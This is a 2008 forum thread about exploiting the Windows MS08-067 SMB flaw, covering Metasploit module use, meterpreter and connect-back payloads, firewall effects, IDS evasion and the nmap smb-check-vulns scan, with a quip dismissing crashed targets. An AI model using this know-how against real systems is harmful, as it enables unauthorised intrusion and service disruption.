Playing with ms08_067

Printable View

Show 40 post(s) from this thread on one page

12-03-2008, 12:47 PM
letmein

I assume this will not work on a firewalled pc? Will test later when I get a chance
12-03-2008, 12:56 PM
purehate

Quote:

Originally Posted by letmein

I assume this will not work on a firewalled pc? Will test later when I get a chance

Yes it will. I did it on a fresh install of server 2003 with the default firewall settings. If the server is behind NAT you would have to change the payload to something that would connect back to you using a metasploit client or something along the lines of netcat. I guess I could expand the tutorial to include that if anyone's interested.
12-03-2008, 01:23 PM
hawaii67

"Default firewall settings" means port 445 open????
Weird :confused:
12-03-2008, 01:42 PM
purehate

Quote:

Originally Posted by hawaii67

"Default firewall settings" means port 445 open????
Weird :confused:

Well I'm no server expert but I assumed the firewall was on by default like in most windows products. Maybe it wasn't. I guess I could check.
12-04-2008, 07:51 AM
imported_=Tron=

Nice tutorial. Tried it on Windows XP SP3 and worked as soon as file and printer sharing was enabled in the firewall.

The windows/smb/ms08_067_netapi exploit can naturally also be used from within metasploit which will allow you to easily change the payload, for example to meterpreter.
12-04-2008, 11:29 AM
imported_Deathray

Got everyone's permission last lunch break at school, and amazingly (at a
computer school), 3 out of the 15 XP users were vulnerable (SP3). I created a text
file on everyone's desktop linking to the patch :b.
I would recommend the Metasploit module as Tron says too. Combine it with the scanner/smb/version module and your prepared (:
12-04-2008, 02:27 PM
purehate

Quote:

I would recommend the Metasploit module as Tron says too. Combine it with the scanner/smb/version module and your prepared (:

I was only posting a alternate way to do it.
12-07-2008, 09:04 AM
imported_Deathray

Quote:

Originally Posted by pureh@te

I was only posting a alternate way to do it.

I didn't mean it like that pureh@te. I myself found your tutorial very useful as I never knew about the nmap scripting engine, and it seems pretty cool (: . What I meant was the actual exploiting process might be more practical through metasploit as you have more options such as IDS evasion and payload selection.
Oh yeah and people do take care when using smb-check-vulns.nse. "Out of 82 vulnerable systems scanned, 52 crashed." :P
12-07-2008, 09:51 AM
purehate

Quote:

Out of 82 vulnerable systems scanned, 52 crashed.

You have to break a few eggs to make a omelet:D
12-08-2008, 11:42 AM
adri_ht_

First of all, let me state this is an excellent thread. Haven't had one of these in months. Thanks pureh@te!

Quote:

Originally Posted by =Tron=

Tried it on Windows XP SP3 and worked as soon as file and printer sharing was enabled in the firewall.

Tried this on my SP3 XP Box and it crashes with the firewall on! Now if I turn it off it will go through. Note that "file and printer sharing" is on by default. I used the metasploit framework with the windows/smb/ms08_067_netapi exploit and meterpreter as the payload. :confused:

Show 40 post(s) from this thread on one page